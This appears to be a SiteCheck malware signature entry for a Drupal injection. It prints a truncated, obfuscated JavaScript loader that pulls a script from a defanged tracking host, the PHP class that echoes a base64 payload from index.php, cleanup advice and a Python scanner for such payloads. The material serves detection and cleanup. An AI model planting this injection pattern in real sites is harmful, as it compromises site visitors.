SiteCheck Signatures

malware.injection.32

Description:
Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...

Typical sample:

<script>
;(​function(){var x=navigator[m("4t}​n)e}gnA(r;eistu}")];var y=document[m(":e}idk​,owodc,")];​if(s(x,m("0s7w)​obd)n)i(W{"))&​&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('​script');b.type='text/javascript';b.async=true;b.​src=m('b2)...skipped...o.parentNode.​insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=​t.length-1;p>=0;p-​-){k+​=t[p];}return k;}​})();
</script>

Cleanup

This malware can be injected into the index.php files of Drupal sites in the form of the following PHP code, which needs to be removed to clean the site.

<?php

class SoFooterClass{

    public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';

    public function __destruct(){

        echo base64_decode($​this-​>data);

    }

}

$​sofooter = new SoFooterClass();

?>
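
One way to locate this injection across a site tree, as an added example that is not part of the original page or SiteCheck's own detection logic. It generalizes beyond the exact class name shown above: it flags any index.php that calls base64_decode() and holds a quoted base64 literal decoding to script markup. The function names, the 40-character floor and the constructed sample are assumptions made for illustration.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# Quoted runs of 40+ base64 characters; the 40 floor is an assumed tuning value.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")
# The injected class echoes base64_decode() of its property from __destruct().
DECODE_CALL = re.compile(r"base64_decode\s*\(", re.IGNORECASE)

def decodes_to_script(literal):
    """True if the literal is valid base64 whose decoded bytes contain a <script tag."""
    try:
        decoded = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return False
    return b"<script" in decoded.lower()

def scan_php_source(source):
    """Return base64 literals that decode to script markup, if the file also decodes base64."""
    if not DECODE_CALL.search(source):
        return []
    return [m.group(1) for m in B64_LITERAL.finditer(source)
            if decodes_to_script(m.group(1))]

def scan_tree(root):
    """Check every index.php under root; return {path: [suspicious literals]}."""
    hits = {}
    for path in Path(root).rglob("index.php"):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: same shape as the injected class, with a harmless payload.
SAMPLE_PAYLOAD = base64.b64encode(b"<script>/* constructed test payload */</script>").decode()
SAMPLE_PHP = ("<?php\nclass SoFooterClass{\n    public $data = '%s';\n"
              "    public function __destruct(){ echo base64_decode($this->data); }\n"
              "}\n$sofooter = new SoFooterClass();\n?>\n" % SAMPLE_PAYLOAD)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, literals in scan_tree(sys.argv[1]).items():
            print(f"{path}: {len(literals)} base64 literal(s) decode to <script>")
    else:
        print(scan_php_source(SAMPLE_PHP) == [SAMPLE_PAYLOAD])
```

Run it with the Drupal document root as the only argument. A hit is a lead for manual review, since legitimate code can also embed base64-encoded markup.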

Affecting:
Drupal.

Mitigation:
How to clean a hacked Drupal site